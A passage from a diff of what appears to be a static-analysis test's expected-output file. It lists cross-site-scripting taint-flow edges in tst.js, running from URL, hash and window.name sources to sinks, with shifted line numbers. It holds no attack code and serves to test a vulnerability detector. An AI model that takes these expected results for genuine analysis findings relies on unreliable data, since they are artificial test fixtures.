tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 | location | tst.js:310:10:310:10 | e | provenance | | -| tst.js:310:10:310:10 | e | tst.js:311:20:311:20 | e | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:327:18:327:34 | document.location | tst.js:327:10:327:35 | new URL ... cation) [searchParams] | provenance | | -| tst.js:331:7:331:43 | params | tst.js:332:18:332:23 | params | provenance | | -| tst.js:331:7:331:43 | params [MapValue] | tst.js:332:18:332:23 | params [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:331:16:331:43 | getTain ... hParams [MapValue] | provenance | | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | tst.js:331:16:331:43 | getTain ... hParams | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams | tst.js:331:7:331:43 | params | provenance | | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | tst.js:331:7:331:43 | params [MapValue] | provenance | | -| tst.js:332:18:332:23 | params | tst.js:332:18:332:35 | params.get('name') | provenance | Config | -| tst.js:332:18:332:23 | params [MapValue] | tst.js:332:18:332:35 | params.get('name') | provenance | | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | tst.js:343:5:343:12 | getUrl() [hash] | provenance | | -| tst.js:341:20:341:36 | document.location | tst.js:341:12:341:37 | new URL ... cation) [hash] | provenance | | -| tst.js:343:5:343:12 | getUrl() [hash] | tst.js:343:5:343:17 | getUrl().hash | provenance | | -| tst.js:343:5:343:17 | getUrl().hash | tst.js:343:5:343:30 | getUrl( ... ring(1) | provenance | Config | -| tst.js:348:7:348:39 | target | tst.js:349:12:349:17 | target | provenance | | -| tst.js:348:16:348:39 | documen ... .search | tst.js:348:7:348:39 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:356:16:356:21 | target | provenance | | -| tst.js:355:10:355:42 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:355:19:355:42 | documen ... .search | tst.js:355:10:355:42 | target | provenance | | -| tst.js:356:16:356:21 | target | tst.js:357:20:357:25 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:360:21:360:26 | target | provenance | | -| tst.js:357:20:357:25 | target | tst.js:363:18:363:23 | target | provenance | | -| tst.js:371:7:371:39 | target | tst.js:374:18:374:23 | target | provenance | | -| tst.js:371:16:371:39 | documen ... .search | tst.js:371:7:371:39 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:384:18:384:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:386:18:386:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:397:18:397:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:406:18:406:23 | target | provenance | | -| tst.js:381:7:381:39 | target | tst.js:408:19:408:24 | target | provenance | | -| tst.js:381:16:381:39 | documen ... .search | tst.js:381:7:381:39 | target | provenance | | -| tst.js:386:18:386:23 | target | tst.js:386:18:386:29 | target.taint | provenance | | -| tst.js:391:3:391:8 | [post update] target [taint3] | tst.js:392:18:392:23 | target [taint3] | provenance | | -| tst.js:391:19:391:42 | documen ... .search | tst.js:391:3:391:8 | [post update] target [taint3] | provenance | | -| tst.js:392:18:392:23 | target [taint3] | tst.js:392:18:392:30 | target.taint3 | provenance | | -| tst.js:397:18:397:23 | target | tst.js:397:18:397:30 | target.taint5 | provenance | | -| tst.js:406:18:406:23 | target | tst.js:406:18:406:30 | target.taint7 | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:408:19:408:24 | target [taint8] | provenance | | -| tst.js:408:3:408:8 | [post update] target [taint8] | tst.js:409:18:409:23 | target [taint8] | provenance | | -| tst.js:408:19:408:24 | target | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:24 | target [taint8] | tst.js:408:19:408:31 | target.taint8 | provenance | | -| tst.js:408:19:408:31 | target.taint8 | tst.js:408:3:408:8 | [post update] target [taint8] | provenance | | -| tst.js:409:18:409:23 | target [taint8] | tst.js:409:18:409:30 | target.taint8 | provenance | | -| tst.js:416:7:416:46 | payload | tst.js:417:18:417:24 | payload | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... .search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
    ' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... .search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... .search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... .search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:9:28:9:30 | loc | typeahead.js:10:16:10:18 | loc | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | @@ -1248,18 +1248,18 @@ subpaths | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | 